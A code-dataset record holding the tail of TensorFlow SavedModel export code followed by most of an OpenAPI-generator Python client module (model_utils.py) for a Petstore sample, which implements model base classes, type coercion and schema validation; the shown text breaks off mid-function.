  builder_impl.copy_assets_to_destination_dir(asset_info.asset_filename_map,
                                              export_dir)
  path = os.path.join(
      compat.as_bytes(export_dir),
      compat.as_bytes(constants.SAVED_MODEL_FILENAME_PB))
  object_graph_proto = _serialize_object_graph(
      saveable_view, asset_info.asset_index)
  meta_graph_def.object_graph_def.CopyFrom(object_graph_proto)
  file_io.write_string_to_file(path, saved_model.SerializeToString())
  # Clean reference cycles so repeated export()s don't make work for the
  # garbage collector. Before this point we need to keep references to
  # captured constants in the saved graph.
  ops.dismantle_graph(exported_graph)
| true | true |
f73278f35cc7eb414b5cff724f44716c77daceda | 74,836 | py | Python | samples/openapi3/client/petstore/python/petstore_api/model_utils.py | mabhijith95a10/openapi-generator | 0f5e7d1e3cb9642bd46ec89ffe0bf66a922029f2 | [
"Apache-2.0"
] | 1 | 2021-04-16T03:59:56.000Z | 2021-04-16T03:59:56.000Z | samples/openapi3/client/petstore/python/petstore_api/model_utils.py | mabhijith95a10/openapi-generator | 0f5e7d1e3cb9642bd46ec89ffe0bf66a922029f2 | [
"Apache-2.0"
] | 26 | 2021-03-19T20:50:29.000Z | 2022-03-21T11:32:33.000Z | samples/openapi3/client/petstore/python/petstore_api/model_utils.py | mabhijith95a10/openapi-generator | 0f5e7d1e3cb9642bd46ec89ffe0bf66a922029f2 | [
"Apache-2.0"
] | 2 | 2021-06-11T15:24:43.000Z | 2021-06-13T12:20:31.000Z | """
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from datetime import date, datetime # noqa: F401
import inspect
import io
import os
import pprint
import re
import tempfile
from dateutil.parser import parse
from petstore_api.exceptions import (
ApiKeyError,
ApiAttributeError,
ApiTypeError,
ApiValueError,
)
# Alias for NoneType, used in type tuples describing nullable properties.
none_type = type(None)
# Base type used to recognize file handles in request/response bodies.
file_type = io.IOBase
class cached_property(object):
    """Descriptor that evaluates a zero-argument callable once and caches it.

    Decorate a no-argument function in a class body; the first attribute
    access invokes the function and stores the result on the descriptor
    itself, so every later access (from any instance) returns the cached
    value without calling the function again.
    """
    result_key = '_results'

    def __init__(self, fn):
        self._fn = fn

    def __get__(self, instance, cls=None):
        cache = vars(self)
        if self.result_key not in cache:
            # First access: compute once and store on the descriptor.
            setattr(self, self.result_key, self._fn())
        return cache[self.result_key]
PRIMITIVE_TYPES = (list, float, int, bool, datetime, date, str, file_type)
def allows_single_value_input(cls):
    """
    Returns True if `cls` (a composed schema model or any descendant model)
    can be instantiated from a single positional value.
    This is true when the class is itself simple/primitive, or when its oneOf
    contains entries like:
    oneOf:
    - float
    - NumberWithValidation
    - StringEnum
    - ArrayModel
    - null
    TODO: lru_cache this
    """
    if issubclass(cls, ModelSimple) or cls in PRIMITIVE_TYPES:
        return True
    if not issubclass(cls, ModelComposed):
        return False
    oneof_classes = cls._composed_schemas['oneOf']
    if not oneof_classes:
        return False
    return any(allows_single_value_input(c) for c in oneof_classes)
def composed_model_input_classes(cls):
    """
    This function returns a list of the possible models that can be accepted as
    inputs.
    TODO: lru_cache this
    """
    # Simple/primitive classes accept only themselves.
    if issubclass(cls, ModelSimple) or cls in PRIMITIVE_TYPES:
        return [cls]
    elif issubclass(cls, ModelNormal):
        if cls.discriminator is None:
            return [cls]
        else:
            # Discriminated models accept any of their discriminated classes.
            return get_discriminated_classes(cls)
    elif issubclass(cls, ModelComposed):
        if not cls._composed_schemas['oneOf']:
            return []
        if cls.discriminator is None:
            # Union of the input classes of every oneOf alternative.
            input_classes = []
            for c in cls._composed_schemas['oneOf']:
                input_classes.extend(composed_model_input_classes(c))
            return input_classes
        else:
            return get_discriminated_classes(cls)
    return []
class OpenApiModel(object):
"""The base class for all OpenAPIModels"""
    def set_attribute(self, name, value):
        """Validates `value` and stores it in this model's data store.

        Checks the name against the spec's declared properties (or the
        additional-properties type), validates/converts the value's type,
        and enforces allowed values and validations before storing.

        Raises:
            ApiAttributeError: If `name` is not a declared property and
                additional properties are not allowed.
            ApiTypeError: If `name` is not a string, or `value` has an
                invalid type.
        """
        # this is only used to set properties on self
        path_to_item = []
        if self._path_to_item:
            path_to_item.extend(self._path_to_item)
        path_to_item.append(name)
        if name in self.openapi_types:
            required_types_mixed = self.openapi_types[name]
        elif self.additional_properties_type is None:
            raise ApiAttributeError(
                "{0} has no attribute '{1}'".format(
                    type(self).__name__, name),
                path_to_item
            )
        elif self.additional_properties_type is not None:
            required_types_mixed = self.additional_properties_type
        # Property names must themselves be strings.
        if get_simple_class(name) != str:
            error_msg = type_error_message(
                var_name=name,
                var_value=name,
                valid_classes=(str,),
                key_type=True
            )
            raise ApiTypeError(
                error_msg,
                path_to_item=path_to_item,
                valid_classes=(str,),
                key_type=True
            )
        if self._check_type:
            # May coerce `value` into one of the required types.
            value = validate_and_convert_types(
                value, required_types_mixed, path_to_item, self._spec_property_naming,
                self._check_type, configuration=self._configuration)
        if (name,) in self.allowed_values:
            check_allowed_values(
                self.allowed_values,
                (name,),
                value
            )
        if (name,) in self.validations:
            check_validations(
                self.validations,
                (name,),
                value,
                self._configuration
            )
        # Store directly in _data_store, bypassing __setattr__.
        self.__dict__['_data_store'][name] = value
    def __repr__(self):
        """Returns the model's string form, for `print` and `pprint`."""
        return self.to_str()
    def __ne__(self, other):
        """Returns true if both objects are not equal (negation of `==`)."""
        return not self == other
    def __setattr__(self, attr, value):
        """set the value of an attribute using dot notation: `instance.attr = val`"""
        # Delegates to __setitem__ so validation in set_attribute applies.
        self[attr] = value
    def __getattr__(self, attr):
        """get the value of an attribute using dot notation: `instance.attr`"""
        # Delegates to __getitem__; only called when normal lookup fails.
        return self.__getitem__(attr)
def __new__(cls, *args, **kwargs):
# this function uses the discriminator to
# pick a new schema/class to instantiate because a discriminator
# propertyName value was passed in
if len(args) == 1:
arg = args[0]
if arg is None and is_type_nullable(cls):
# The input data is the 'null' value and the type is nullable.
return None
if issubclass(cls, ModelComposed) and allows_single_value_input(cls):
model_kwargs = {}
oneof_instance = get_oneof_instance(cls, model_kwargs, kwargs, model_arg=arg)
return oneof_instance
visited_composed_classes = kwargs.get('_visited_composed_classes', ())
if (
cls.discriminator is None or
cls in visited_composed_classes
):
# Use case 1: this openapi schema (cls) does not have a discriminator
# Use case 2: we have already visited this class before and are sure that we
# want to instantiate it this time. We have visited this class deserializing
# a payload with a discriminator. During that process we traveled through
# this class but did not make an instance of it. Now we are making an
# instance of a composed class which contains cls in it, so this time make an instance of cls.
#
# Here's an example of use case 2: If Animal has a discriminator
# petType and we pass in "Dog", and the class Dog
# allOf includes Animal, we move through Animal
# once using the discriminator, and pick Dog.
# Then in the composed schema dog Dog, we will make an instance of the
# Animal class (because Dal has allOf: Animal) but this time we won't travel
# through Animal's discriminator because we passed in
# _visited_composed_classes = (Animal,)
return super(OpenApiModel, cls).__new__(cls)
# Get the name and value of the discriminator property.
# The discriminator name is obtained from the discriminator meta-data
# and the discriminator value is obtained from the input data.
discr_propertyname_py = list(cls.discriminator.keys())[0]
discr_propertyname_js = cls.attribute_map[discr_propertyname_py]
if discr_propertyname_js in kwargs:
discr_value = kwargs[discr_propertyname_js]
elif discr_propertyname_py in kwargs:
discr_value = kwargs[discr_propertyname_py]
else:
# The input data does not contain the discriminator property.
path_to_item = kwargs.get('_path_to_item', ())
raise ApiValueError(
"Cannot deserialize input data due to missing discriminator. "
"The discriminator property '%s' is missing at path: %s" %
(discr_propertyname_js, path_to_item)
)
# Implementation note: the last argument to get_discriminator_class
# is a list of visited classes. get_discriminator_class may recursively
# call itself and update the list of visited classes, and the initial
# value must be an empty list. Hence not using 'visited_composed_classes'
new_cls = get_discriminator_class(
cls, discr_propertyname_py, discr_value, [])
if new_cls is None:
path_to_item = kwargs.get('_path_to_item', ())
disc_prop_value = kwargs.get(
discr_propertyname_js, kwargs.get(discr_propertyname_py))
raise ApiValueError(
"Cannot deserialize input data due to invalid discriminator "
"value. The OpenAPI document has no mapping for discriminator "
"property '%s'='%s' at path: %s" %
(discr_propertyname_js, disc_prop_value, path_to_item)
)
if new_cls in visited_composed_classes:
# if we are making an instance of a composed schema Descendent
# which allOf includes Ancestor, then Ancestor contains
# a discriminator that includes Descendent.
# So if we make an instance of Descendent, we have to make an
# instance of Ancestor to hold the allOf properties.
# This code detects that use case and makes the instance of Ancestor
# For example:
# When making an instance of Dog, _visited_composed_classes = (Dog,)
# then we make an instance of Animal to include in dog._composed_instances
# so when we are here, cls is Animal
# cls.discriminator != None
# cls not in _visited_composed_classes
# new_cls = Dog
# but we know we know that we already have Dog
# because it is in visited_composed_classes
# so make Animal here
return super(OpenApiModel, cls).__new__(cls)
# Build a list containing all oneOf and anyOf descendants.
oneof_anyof_classes = None
if cls._composed_schemas is not None:
oneof_anyof_classes = (
cls._composed_schemas.get('oneOf', ()) +
cls._composed_schemas.get('anyOf', ()))
oneof_anyof_child = new_cls in oneof_anyof_classes
kwargs['_visited_composed_classes'] = visited_composed_classes + (cls,)
if cls._composed_schemas.get('allOf') and oneof_anyof_child:
# Validate that we can make self because when we make the
# new_cls it will not include the allOf validations in self
self_inst = super(OpenApiModel, cls).__new__(cls)
self_inst.__init__(*args, **kwargs)
new_inst = new_cls.__new__(new_cls, *args, **kwargs)
new_inst.__init__(*args, **kwargs)
return new_inst
class ModelSimple(OpenApiModel):
    """the parent class of models whose type != object in their
    swagger/openapi

    The single wrapped value lives under the 'value' key of _data_store.
    """
    def __setitem__(self, name, value):
        """set the value of an attribute using square-bracket notation: `instance[attr] = val`"""
        if name in self.required_properties:
            self.__dict__[name] = value
            return
        self.set_attribute(name, value)
    def get(self, name, default=None):
        """returns the value of an attribute or some default value if the attribute was not set"""
        if name in self.required_properties:
            return self.__dict__[name]
        return self.__dict__['_data_store'].get(name, default)
    def __getitem__(self, name):
        """get the value of an attribute using square-bracket notation: `instance[attr]`"""
        if name in self:
            return self.get(name)
        raise ApiAttributeError(
            "{0} has no attribute '{1}'".format(
                type(self).__name__, name),
            [e for e in [self._path_to_item, name] if e]
        )
    def __contains__(self, name):
        """used by `in` operator to check if an attribute value was set in an instance: `'attr' in instance`"""
        if name in self.required_properties:
            return name in self.__dict__
        return name in self.__dict__['_data_store']
    def to_str(self):
        """Returns the string representation of the model"""
        return str(self.value)
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, self.__class__):
            return False
        # fix: the previous code also collected the two operand types into an
        # unused set here; only the value comparison matters
        return self._data_store['value'] == other._data_store['value']
class ModelNormal(OpenApiModel):
    """the parent class of models whose type == object in their
    swagger/openapi"""
    def __setitem__(self, name, value):
        """set the value of an attribute using square-bracket notation: `instance[attr] = val`"""
        if name in self.required_properties:
            self.__dict__[name] = value
            return
        self.set_attribute(name, value)
    def get(self, name, default=None):
        """returns the value of an attribute or some default value if the attribute was not set"""
        if name in self.required_properties:
            return self.__dict__[name]
        return self.__dict__['_data_store'].get(name, default)
    def __getitem__(self, name):
        """get the value of an attribute using square-bracket notation: `instance[attr]`"""
        if name in self:
            return self.get(name)
        raise ApiAttributeError(
            "{0} has no attribute '{1}'".format(
                type(self).__name__, name),
            [e for e in [self._path_to_item, name] if e]
        )
    def __contains__(self, name):
        """used by `in` operator to check if an attribute value was set in an instance: `'attr' in instance`"""
        if name in self.required_properties:
            return name in self.__dict__
        return name in self.__dict__['_data_store']
    def to_dict(self):
        """Returns the model properties as a dict"""
        return model_to_dict(self, serialize=False)
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, self.__class__):
            return False
        if not set(self._data_store.keys()) == set(other._data_store.keys()):
            return False
        for _var_name, this_val in self._data_store.items():
            that_val = other._data_store[_var_name]
            # fix: the previous code also collected the two operand types into
            # an unused set on every iteration; only equality matters
            if not (this_val == that_val):
                return False
        return True
class ModelComposed(OpenApiModel):
    """the parent class of models whose type == object in their
    swagger/openapi and have oneOf/allOf/anyOf
    When one sets a property we use var_name_to_model_instances to store the value in
    the correct class instances + run any type checking + validation code.
    When one gets a property we use var_name_to_model_instances to get the value
    from the correct class instances.
    This allows multiple composed schemas to contain the same property with additive
    constraints on the value.
    _composed_schemas (dict) stores the anyOf/allOf/oneOf classes
    key (str): allOf/oneOf/anyOf
    value (list): the classes in the XOf definition.
        Note: none_type can be included when the openapi document version >= 3.1.0
    _composed_instances (list): stores a list of instances of the composed schemas
    defined in _composed_schemas. When properties are accessed in the self instance,
    they are returned from the self._data_store or the data stores in the instances
    in self._composed_schemas
    _var_name_to_model_instances (dict): maps between a variable name on self and
    the composed instances (self included) which contain that data
    key (str): property name
    value (list): list of class instances, self or instances in _composed_instances
    which contain the value that the key is referring to.
    """
    def __setitem__(self, name, value):
        """set the value of an attribute using square-bracket notation: `instance[attr] = val`"""
        if name in self.required_properties:
            self.__dict__[name] = value
            return
        # set the attribute on the correct instance
        model_instances = self._var_name_to_model_instances.get(
            name, self._additional_properties_model_instances)
        if model_instances:
            for model_instance in model_instances:
                if model_instance == self:
                    self.set_attribute(name, value)
                else:
                    setattr(model_instance, name, value)
                if name not in self._var_name_to_model_instances:
                    # we assigned an additional property
                    # NOTE(review): this stores a single instance, while get()
                    # and __contains__ iterate the stored value as a list of
                    # instances — confirm additional-property reads work here
                    self.__dict__['_var_name_to_model_instances'][name] = (
                        model_instance
                    )
            return None
        raise ApiAttributeError(
            "{0} has no attribute '{1}'".format(
                type(self).__name__, name),
            [e for e in [self._path_to_item, name] if e]
        )
    # sentinel used by __getitem__ to distinguish "unset" from a stored None
    __unset_attribute_value__ = object()
    def get(self, name, default=None):
        """returns the value of an attribute or some default value if the attribute was not set"""
        if name in self.required_properties:
            return self.__dict__[name]
        # get the attribute from the correct instance
        model_instances = self._var_name_to_model_instances.get(
            name, self._additional_properties_model_instances)
        values = []
        # A composed model stores child (oneof/anyOf/allOf) models under
        # self._var_name_to_model_instances. A named property can exist in
        # multiple child models. If the property is present in more than one
        # child model, the value must be the same across all the child models.
        if model_instances:
            for model_instance in model_instances:
                if name in model_instance._data_store:
                    v = model_instance._data_store[name]
                    if v not in values:
                        values.append(v)
        len_values = len(values)
        if len_values == 0:
            return default
        elif len_values == 1:
            return values[0]
        elif len_values > 1:
            raise ApiValueError(
                "Values stored for property {0} in {1} differ when looking "
                "at self and self's composed instances. All values must be "
                "the same".format(name, type(self).__name__),
                [e for e in [self._path_to_item, name] if e]
            )
    def __getitem__(self, name):
        """get the value of an attribute using square-bracket notation: `instance[attr]`"""
        value = self.get(name, self.__unset_attribute_value__)
        if value is self.__unset_attribute_value__:
            raise ApiAttributeError(
                "{0} has no attribute '{1}'".format(
                    type(self).__name__, name),
                [e for e in [self._path_to_item, name] if e]
            )
        return value
    def __contains__(self, name):
        """used by `in` operator to check if an attribute value was set in an instance: `'attr' in instance`"""
        if name in self.required_properties:
            return name in self.__dict__
        model_instances = self._var_name_to_model_instances.get(
            name, self._additional_properties_model_instances)
        if model_instances:
            for model_instance in model_instances:
                if name in model_instance._data_store:
                    return True
        return False
    def to_dict(self):
        """Returns the model properties as a dict"""
        return model_to_dict(self, serialize=False)
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, self.__class__):
            return False
        if not set(self._data_store.keys()) == set(other._data_store.keys()):
            return False
        for _var_name, this_val in self._data_store.items():
            that_val = other._data_store[_var_name]
            # fix: the previous code also collected the two operand types into
            # an unused set on every iteration; only equality matters
            if not (this_val == that_val):
                return False
        return True
# Lower index = tried first when coercing a value into one of several
# candidate types.
COERCION_INDEX_BY_TYPE = {
    ModelComposed: 0,
    ModelNormal: 1,
    ModelSimple: 2,
    none_type: 3,  # The type of 'None'.
    list: 4,
    dict: 5,
    float: 6,
    int: 7,
    bool: 8,
    datetime: 9,
    date: 10,
    str: 11,
    file_type: 12,  # 'file_type' is an alias for the built-in 'file' or 'io.IOBase' type.
}
# these are used to limit what type conversions we try to do
# when we have a valid type already and we want to try converting
# to another type
# fix: the duplicate (list, ModelComposed) entry has been removed
UPCONVERSION_TYPE_PAIRS = (
    (str, datetime),
    (str, date),
    (int, float),  # A float may be serialized as an integer, e.g. '3' is a valid serialized float.
    (list, ModelComposed),
    (dict, ModelComposed),
    (str, ModelComposed),
    (int, ModelComposed),
    (float, ModelComposed),
    (list, ModelNormal),
    (dict, ModelNormal),
    (str, ModelSimple),
    (int, ModelSimple),
    (float, ModelSimple),
    (list, ModelSimple),
)
COERCIBLE_TYPE_PAIRS = {
    False: (  # client instantiation of a model with client data
        # (dict, ModelComposed),
        # (list, ModelComposed),
        # (dict, ModelNormal),
        # (list, ModelNormal),
        # (str, ModelSimple),
        # (int, ModelSimple),
        # (float, ModelSimple),
        # (list, ModelSimple),
        # (str, int),
        # (str, float),
        # (str, datetime),
        # (str, date),
        # (int, str),
        # (float, str),
    ),
    True: (  # server -> client data
        (dict, ModelComposed),
        (list, ModelComposed),
        (dict, ModelNormal),
        (list, ModelNormal),
        (str, ModelSimple),
        (int, ModelSimple),
        (float, ModelSimple),
        (list, ModelSimple),
        # (str, int),
        # (str, float),
        (str, datetime),
        (str, date),
        # (int, str),
        # (float, str),
        (str, file_type)
    ),
}
def get_simple_class(input_value):
    """Returns an input_value's simple class that we will use for type checking

    Args:
        input_value (class/class_instance): the item for which we will return
            the simple class
    """
    if isinstance(input_value, type):
        # already a class; return it unchanged
        return input_value
    if isinstance(input_value, tuple):
        return tuple
    if isinstance(input_value, list):
        return list
    if isinstance(input_value, dict):
        return dict
    if isinstance(input_value, none_type):
        return none_type
    if isinstance(input_value, file_type):
        return file_type
    # bool must be tested before int because isinstance(True, int) is True
    if isinstance(input_value, bool):
        return bool
    if isinstance(input_value, int):
        return int
    # datetime must be tested before date because a datetime is also a date
    if isinstance(input_value, datetime):
        return datetime
    if isinstance(input_value, date):
        return date
    if isinstance(input_value, str):
        return str
    return type(input_value)
def check_allowed_values(allowed_values, input_variable_path, input_values):
    """Raises an exception if the input_values are not allowed

    Args:
        allowed_values (dict): the allowed_values dict
        input_variable_path (tuple): the path to the input variable
        input_values (list/str/int/float/date/datetime): the values that we
            are checking to see if they are in allowed_values

    Raises:
        ApiValueError: if input_values contain a disallowed value/key
    """
    these_allowed_values = list(allowed_values[input_variable_path].values())
    if (isinstance(input_values, list)
            and not set(input_values).issubset(
                set(these_allowed_values))):
        # fix: a stray trailing comma previously made invalid_values a
        # one-element tuple, garbling the rendered error message
        invalid_values = ", ".join(
            map(str, set(input_values) - set(these_allowed_values)))
        raise ApiValueError(
            "Invalid values for `%s` [%s], must be a subset of [%s]" %
            (
                input_variable_path[0],
                invalid_values,
                ", ".join(map(str, these_allowed_values))
            )
        )
    elif (isinstance(input_values, dict)
            and not set(
                input_values.keys()).issubset(set(these_allowed_values))):
        invalid_values = ", ".join(
            map(str, set(input_values.keys()) - set(these_allowed_values)))
        raise ApiValueError(
            "Invalid keys in `%s` [%s], must be a subset of [%s]" %
            (
                input_variable_path[0],
                invalid_values,
                ", ".join(map(str, these_allowed_values))
            )
        )
    elif (not isinstance(input_values, (list, dict))
            and input_values not in these_allowed_values):
        raise ApiValueError(
            "Invalid value for `%s` (%s), must be one of %s" %
            (
                input_variable_path[0],
                input_values,
                these_allowed_values
            )
        )
def is_json_validation_enabled(schema_keyword, configuration=None):
    """Returns true if JSON schema validation is enabled for the specified
    validation keyword. This can be used to skip JSON schema structural validation
    as requested in the configuration.

    Args:
        schema_keyword (string): the name of a JSON schema validation keyword.
        configuration (Configuration): the configuration class.
    """
    if configuration is None:
        return True
    if not hasattr(configuration, '_disabled_client_side_validations'):
        return True
    return schema_keyword not in configuration._disabled_client_side_validations
def check_validations(
        validations, input_variable_path, input_values,
        configuration=None):
    """Raises an exception if the input_values are invalid

    Args:
        validations (dict): the validation dictionary.
        input_variable_path (tuple): the path to the input variable.
        input_values (list/str/int/float/date/datetime): the values that we
            are checking.
        configuration (Configuration): the configuration class.

    Raises:
        ApiValueError: if any enabled validation fails.
    """
    if input_values is None:
        # nothing to validate; None-ness is enforced by type checking elsewhere
        return
    current_validations = validations[input_variable_path]
    if (is_json_validation_enabled('multipleOf', configuration) and
            'multiple_of' in current_validations and
            isinstance(input_values, (int, float)) and
            not (float(input_values) / current_validations['multiple_of']).is_integer()):
        # Note 'multipleOf' will be as good as the floating point arithmetic.
        raise ApiValueError(
            "Invalid value for `%s`, value must be a multiple of "
            "`%s`" % (
                input_variable_path[0],
                current_validations['multiple_of']
            )
        )
    if (is_json_validation_enabled('maxLength', configuration) and
            'max_length' in current_validations and
            len(input_values) > current_validations['max_length']):
        raise ApiValueError(
            "Invalid value for `%s`, length must be less than or equal to "
            "`%s`" % (
                input_variable_path[0],
                current_validations['max_length']
            )
        )
    if (is_json_validation_enabled('minLength', configuration) and
            'min_length' in current_validations and
            len(input_values) < current_validations['min_length']):
        raise ApiValueError(
            "Invalid value for `%s`, length must be greater than or equal to "
            "`%s`" % (
                input_variable_path[0],
                current_validations['min_length']
            )
        )
    if (is_json_validation_enabled('maxItems', configuration) and
            'max_items' in current_validations and
            len(input_values) > current_validations['max_items']):
        raise ApiValueError(
            "Invalid value for `%s`, number of items must be less than or "
            "equal to `%s`" % (
                input_variable_path[0],
                current_validations['max_items']
            )
        )
    if (is_json_validation_enabled('minItems', configuration) and
            'min_items' in current_validations and
            len(input_values) < current_validations['min_items']):
        # fix: previously raised the builtin ValueError, unlike every other
        # validation in this function which raises ApiValueError
        raise ApiValueError(
            "Invalid value for `%s`, number of items must be greater than or "
            "equal to `%s`" % (
                input_variable_path[0],
                current_validations['min_items']
            )
        )
    items = ('exclusive_maximum', 'inclusive_maximum', 'exclusive_minimum',
             'inclusive_minimum')
    if (any(item in current_validations for item in items)):
        # range checks compare the extreme element of containers, or the
        # value itself for scalars
        if isinstance(input_values, list):
            max_val = max(input_values)
            min_val = min(input_values)
        elif isinstance(input_values, dict):
            max_val = max(input_values.values())
            min_val = min(input_values.values())
        else:
            max_val = input_values
            min_val = input_values
        if (is_json_validation_enabled('exclusiveMaximum', configuration) and
                'exclusive_maximum' in current_validations and
                max_val >= current_validations['exclusive_maximum']):
            raise ApiValueError(
                "Invalid value for `%s`, must be a value less than `%s`" % (
                    input_variable_path[0],
                    current_validations['exclusive_maximum']
                )
            )
        if (is_json_validation_enabled('maximum', configuration) and
                'inclusive_maximum' in current_validations and
                max_val > current_validations['inclusive_maximum']):
            raise ApiValueError(
                "Invalid value for `%s`, must be a value less than or equal to "
                "`%s`" % (
                    input_variable_path[0],
                    current_validations['inclusive_maximum']
                )
            )
        if (is_json_validation_enabled('exclusiveMinimum', configuration) and
                'exclusive_minimum' in current_validations and
                min_val <= current_validations['exclusive_minimum']):
            raise ApiValueError(
                "Invalid value for `%s`, must be a value greater than `%s`" %
                (
                    input_variable_path[0],
                    # fix: this message previously read the unrelated
                    # 'exclusive_maximum' key, which could raise KeyError
                    current_validations['exclusive_minimum']
                )
            )
        if (is_json_validation_enabled('minimum', configuration) and
                'inclusive_minimum' in current_validations and
                min_val < current_validations['inclusive_minimum']):
            raise ApiValueError(
                "Invalid value for `%s`, must be a value greater than or equal "
                "to `%s`" % (
                    input_variable_path[0],
                    current_validations['inclusive_minimum']
                )
            )
    flags = current_validations.get('regex', {}).get('flags', 0)
    if (is_json_validation_enabled('pattern', configuration) and
            'regex' in current_validations and
            not re.search(current_validations['regex']['pattern'],
                          input_values, flags=flags)):
        err_msg = r"Invalid value for `%s`, must match regular expression `%s`" % (
            input_variable_path[0],
            current_validations['regex']['pattern']
        )
        if flags != 0:
            # Don't print the regex flags if the flags are not
            # specified in the OAS document.
            err_msg = r"%s with flags=`%s`" % (err_msg, flags)
        raise ApiValueError(err_msg)
def order_response_types(required_types):
    """Returns the required types sorted in coercion order

    Args:
        required_types (list/tuple): collection of classes or instance of
            list or dict with class information inside it.

    Returns:
        (list): coercion order sorted collection of classes or instance
            of list or dict with class information inside it.
    """
    def _coercion_index(class_or_instance):
        # container type hints (list/dict instances carry child type info)
        if isinstance(class_or_instance, list):
            return COERCION_INDEX_BY_TYPE[list]
        if isinstance(class_or_instance, dict):
            return COERCION_INDEX_BY_TYPE[dict]
        # model classes map onto their base-model coercion slot;
        # check ModelComposed first, mirroring the original priority
        if inspect.isclass(class_or_instance):
            for model_base in (ModelComposed, ModelNormal, ModelSimple):
                if issubclass(class_or_instance, model_base):
                    return COERCION_INDEX_BY_TYPE[model_base]
        if class_or_instance in COERCION_INDEX_BY_TYPE:
            return COERCION_INDEX_BY_TYPE[class_or_instance]
        raise ApiValueError("Unsupported type: %s" % class_or_instance)
    return sorted(required_types, key=_coercion_index)
def remove_uncoercible(required_types_classes, current_item, spec_property_naming,
                       must_convert=True):
    """Only keeps the type conversions that are possible

    Args:
        required_types_classes (tuple): tuple of classes that are required
            these should be ordered by COERCION_INDEX_BY_TYPE
        current_item (any): the current item (input data) to be converted
        spec_property_naming (bool): True if the variable names in the input
            data are serialized names as specified in the OpenAPI document.
            False if the variables names in the input data are python
            variable names in PEP-8 snake case.

    Keyword Args:
        must_convert (bool): if True the item to convert is of the wrong
            type and we want a big list of coercibles
            if False, we want a limited list of coercibles

    Returns:
        (list): the remaining coercible required types, classes only
    """
    current_simple_class = get_simple_class(current_item)
    kept_classes = []
    for candidate in required_types_classes:
        # collapse concrete model classes onto their base model category
        simplified = candidate
        if isinstance(simplified, type):
            for model_base in (ModelComposed, ModelNormal, ModelSimple):
                if issubclass(simplified, model_base):
                    simplified = model_base
                    break
        if simplified == current_simple_class:
            # never convert a value to its own class
            continue
        pair = (current_simple_class, simplified)
        if must_convert and pair in COERCIBLE_TYPE_PAIRS[spec_property_naming]:
            kept_classes.append(candidate)
        elif pair in UPCONVERSION_TYPE_PAIRS:
            kept_classes.append(candidate)
    return kept_classes
def get_discriminated_classes(cls):
    """
    Returns all the classes that a discriminator converts to
    TODO: lru_cache this
    """
    discr_property = list(cls.discriminator.keys())[0]
    collected = []
    if is_type_nullable(cls):
        collected.append(cls)
    for mapped_cls in cls.discriminator[discr_property].values():
        # recurse through classes that themselves declare a discriminator
        if getattr(mapped_cls, 'discriminator', None) is not None:
            collected.extend(get_discriminated_classes(mapped_cls))
        else:
            collected.append(mapped_cls)
    return collected
def get_possible_classes(cls, from_server_context):
    """Returns the classes that input data for cls may deserialize into."""
    # TODO: lru_cache this
    if from_server_context:
        # server responses deserialize directly into cls
        return [cls]
    if getattr(cls, 'discriminator', None) is not None:
        # the discriminator mapping replaces cls entirely
        return list(get_discriminated_classes(cls))
    possible_classes = [cls]
    if issubclass(cls, ModelComposed):
        possible_classes.extend(composed_model_input_classes(cls))
    return possible_classes
def get_required_type_classes(required_types_mixed, spec_property_naming):
    """Converts the tuple required_types into a tuple and a dict described
    below

    Args:
        required_types_mixed (tuple/list): will contain either classes or
            instance of list or dict
        spec_property_naming (bool): if True these values came from the
            server, and we use the data types in our endpoints.
            If False, we are client side and we need to include
            oneOf and discriminator classes inside the data types in our endpoints

    Returns:
        (valid_classes, dict_valid_class_to_child_types_mixed):
            valid_classes (tuple): the valid classes that the current item
                should be
            dict_valid_class_to_child_types_mixed (dict):
                valid_class (class): this is the key
                child_types_mixed (list/dict/tuple): describes the valid child
                    types
    """
    valid_classes = []
    child_req_types_by_current_type = {}
    for req_type in required_types_mixed:
        container_cls = None
        for candidate in (list, tuple, dict):
            if isinstance(req_type, candidate):
                container_cls = candidate
                break
        if container_cls is None:
            # a plain class: expand to every class it may deserialize into
            valid_classes.extend(
                get_possible_classes(req_type, spec_property_naming))
            continue
        valid_classes.append(container_cls)
        # dict instances describe child types under the str key;
        # list/tuple instances are the child type spec themselves
        child_req_types_by_current_type[container_cls] = (
            req_type[str] if container_cls is dict else req_type)
    return tuple(valid_classes), child_req_types_by_current_type
def change_keys_js_to_python(input_dict, model_class):
    """
    Converts from javascript_key keys in the input_dict to python_keys in
    the output dict using the mapping in model_class.
    If the input_dict contains a key which does not declared in the model_class,
    the key is added to the output dict as is. The assumption is the model_class
    may have undeclared properties (additionalProperties attribute in the OAS
    document).
    """
    attr_map = getattr(model_class, 'attribute_map', None)
    if attr_map is None:
        # no mapping declared; hand the input back untouched
        return input_dict
    js_to_python = {js_name: py_name for py_name, js_name in attr_map.items()}
    # unknown keys pass through unchanged (possible additionalProperties)
    return {
        js_to_python.get(js_key, js_key): value
        for js_key, value in input_dict.items()
    }
def get_type_error(var_value, path_to_item, valid_classes, key_type=False):
    """Builds and returns an ApiTypeError describing the invalid value."""
    # the variable name is the last element of its path
    message = type_error_message(
        var_name=path_to_item[-1],
        var_value=var_value,
        valid_classes=valid_classes,
        key_type=key_type,
    )
    return ApiTypeError(
        message,
        path_to_item=path_to_item,
        valid_classes=valid_classes,
        key_type=key_type,
    )
def deserialize_primitive(data, klass, path_to_item):
    """Deserializes string to primitive type.

    :param data: str/int/float
    :param klass: str/class the class to convert to

    :return: int, float, str, bool, date, datetime
    """
    additional_message = ""
    try:
        if klass not in {datetime, date}:
            converted_value = klass(data)
            # guard against lossy string -> float conversion, e.g.
            # '7' -> 7.0 -> '7.0' != '7'
            if klass == float and isinstance(data, str):
                if str(converted_value) != data:
                    raise ValueError('This is not a float')
            return converted_value
        additional_message = (
            "If you need your parameter to have a fallback "
            "string value, please set its type as `type: {}` in your "
            "spec. That allows the value to be any type. "
        )
        if len(data) < 8:
            # too short to be any iso8601 date or datetime
            if klass == date:
                raise ValueError("This is not a date")
            raise ValueError("This is not a datetime")
        if klass == date:
            return parse(data).date()
        # klass == datetime; the string should be in iso8601 datetime format
        parsed_datetime = parse(data)
        looks_like_plain_date = (
